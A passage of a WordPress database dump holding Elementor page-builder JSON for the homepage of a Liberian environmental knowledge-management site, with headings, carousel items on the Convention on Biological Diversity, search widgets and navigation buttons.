widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\"},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"The United Nations Convention on Biological Diversity\",\"item_text\":\"The Convention on Biological Diversity (CBD) entered into force on 29 December 1993.\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"oscar\",\"img_size\":\"medium\",\"title_html_tag\":\"h4\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"dots\":\"true\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11443,1858,'_elementor_version','2.7.5'),(11444,1858,'_elementor_template_type','wp-page'),(11445,1858,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11447,1859,'_wp_page_template','default'),(11448,1859,'_elementor_edit_mode','builder'),(11449,1859,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\"},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"United Nations Convention on Biological Diversity\",\"item_text\":\"The CBD entered into force on 29 December 1993.\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"roxy\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"dots\":\"true\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\